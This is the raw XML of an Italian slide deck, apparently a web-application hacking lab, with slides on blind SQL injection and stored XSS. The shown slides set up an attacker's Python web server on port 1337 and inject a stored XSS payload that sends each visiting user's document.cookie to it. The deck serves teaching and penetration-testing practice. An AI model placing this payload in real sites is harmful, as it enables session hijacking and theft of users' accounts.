                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1337</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" baseline="30000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simula un web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> sull’IP 0.0.0.0 (è un indirizzo ‘‘speciale’’ che rende il server in ascolto su tutte le interfacce di rete disponibili) alla porta 1337.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Questo sarà il server sotto il controllo dell’attaccante.</a:t>
            </a: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Successivamente andiamo ad impostare un nome ed uno script al nostro attacco XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> (in questo caso, lo script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='http://0.0.0.0:1337/?cookie=‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> invierà al server web con IP 0.0.0.0 le informazioni contenute nel cookie rubato tramite l’attacco). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Eseguiamo l’injection tramite il pulsante «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>».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t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/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E30BFD18-0A8E-0EFE-474F-E7199FD0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4" y="4219850"/>
            <a:ext cx="5425273" cy="1616379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A753EA1F-376E-1E7A-C06C-BACFA101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" y="2205170"/>
            <a:ext cx="5402876" cy="96479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C274A6-E3C9-31AB-58AB-8A5003AF1B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344893" y="1936057"/>
            <a:ext cx="32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202C8F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2DA403B-5652-31FE-E8B5-A30F809FEB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344893" y="3980899"/>
            <a:ext cx="32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202C8F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26865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457" y="210312"/>
            <a:ext cx="3887085" cy="7680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dirty="0"/>
              <a:t>XSS STORED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103" y="1240967"/>
            <a:ext cx="5515897" cy="510915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1800" dirty="0"/>
              <a:t>Accediamo con lo user vittima scelto in precedenza e possiamo notare come, dal momento dell’injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogni volta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> che si arriverà sull’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirizzo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> della tab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>, si verrà riportati su una nuova pagina contenente le informazioni del nostro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" baseline="30000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Questo perché l’ XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> va ad intaccare il server web e non il singolo utente, arrecando danno a tutti gli utenti che visiteranno un determinato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a: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br>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Conseguentemente, la stessa informazione, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>viene visualizzata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> sul terminale dal quale avevamo avviato il web server dell’attaccante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>.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48F63A3B-78C7-47BE-AE5E-E10140E04643}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, Carattere, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF624C9F-E26C-3C5C-C556-BC8502353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89"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226142" y="1799386"/>
            <a:ext cx="5869858" cy="133511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668E38-78C6-69BD-1DFD-6D2265451927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771938" y="1491609"/>
            <a:ext cx="32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202C8F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.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C321504-87FC-31EC-B6DB-1FC0059E0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42" y="5444094"/>
            <a:ext cx="11662184" cy="906027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7440746-EC6E-703B-1248-AE475527E181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11564264" y="5136317"/>
            <a:ext cx="32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202C8F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6065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239816"/>
            <a:ext cx="6400800" cy="67342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40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Conclusioni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5600" y="4033869"/>
            <a:ext cx="6400800" cy="512064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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C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Del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C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Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF8C8C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Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427550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65_TF78438558_Win32" id="{2FF293E6-F903-4A44-B7DE-D79C907B4FD3}" vid="{644B2A06-8A3A-4367-858F-BF7CA4791EA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{FCB3CE95-74D3-4341-9F7D-8B0563C066D1}tf78438558_win32</Template>
  <TotalTime>364</TotalTime>
  <Words>656</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>32</Paragraphs>
  <Slides>11</Slides>
  <Notes>10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Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Sabon Next LT</vt:lpstr>
      <vt:lpstr>Tema di Office</vt:lpstr>
      <vt:lpstr>WEB APPLICATION HACKING </vt:lpstr>
      <vt:lpstr>Introduzione</vt:lpstr>
      <vt:lpstr>SQL Injection blind</vt:lpstr>
      <vt:lpstr>SQLi BLIND</vt:lpstr>
      <vt:lpstr>SQLi BLIND</vt:lpstr>
      <vt:lpstr>XSS Stored</vt:lpstr>
      <vt:lpstr>XSS STORED</vt:lpstr>
      <vt:lpstr>XSS STORED</vt:lpstr>
      <vt:lpstr>Conclusioni</vt:lpstr>
      <vt:lpstr>conclusioni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HACKING </dc:title>
  <dc:subject/>
  <dc:creator>Ivan Galati</dc:creator>
  <cp:lastModifiedBy>Ivan Galati</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-04T09:09:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-04T15:14:11Z</dcterms:modified>
</cp:coreProperties>
</file>